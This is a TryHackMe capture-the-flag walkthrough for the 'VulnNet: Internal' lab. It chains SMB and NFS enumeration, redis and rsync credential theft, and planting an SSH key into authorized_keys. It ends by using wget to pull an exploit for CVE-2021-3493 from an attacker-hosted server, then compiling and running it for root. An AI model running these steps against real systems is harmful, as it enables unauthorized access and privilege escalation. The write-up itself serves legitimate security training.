TryHackMe solution: VulnNet: Internal

Use nmap to find open ports:

nmap -sCV 10.10.127.171

We check for available shares on the host with smbclient.

We can install with:

sudo apt-get install smbclient

-N, --no-pass,   Don't ask for a password
-L, --list=HOST, Get a list of shares available on a host

smbclient -N -L \\\\10.10.127.171\\

There is a share named shares, and we access it with:

smbclient -N \\\\10.10.127.171\\shares

And we have services.txt.

View mount with:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.127.171

We will create a new directory and mount data to it.

mkdir conf
mount -t nfs 10.10.127.171:/opt/conf conf

We will have a password for redis in conf/redis/redis.conf.

cat conf/redis/redis.conf | grep "pass"

Install redis-tools with:

sudo apt install redis-tools

And connect to redis.

redis-cli -h 10.10.127.171 -a 'B65Hx562F@ggAZ@F'

Get the flag with:

get "internal flag"

Get key authlist.

lrange authlist 0 10

And we have base64 strings.

QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==

Decode it, we have the authorization for rsync.

Enumerate rsync.

rsync -av --list-only rsync://10.10.127.171:873

Create new directory and copy all files to it.

mkdir rsync
rsync -av rsync://rsync-connect@10.10.127.171:873/files ./rsync

And we have user.txt and the username “sys-internal“.

We will upload a ssh key to the server with rsync:

ssh-keygen -f id_rsa
rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.127.171:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g

Connect to ssh:

ssh sys-internal@10.10.127.171 -i id_rsa

This room is vulnerable to CVE-2021-3493 and we can exploit it with this.

Download exploit.c and host a http server on our machine:

python3 -m http.server

In the target machine, we run:

cd /tmp
wget http://10.6.63.158:8000/exploit.c
gcc exploit.c -o exploit
./exploit

And we get /root/root.txt.

Leave a comment Cancel reply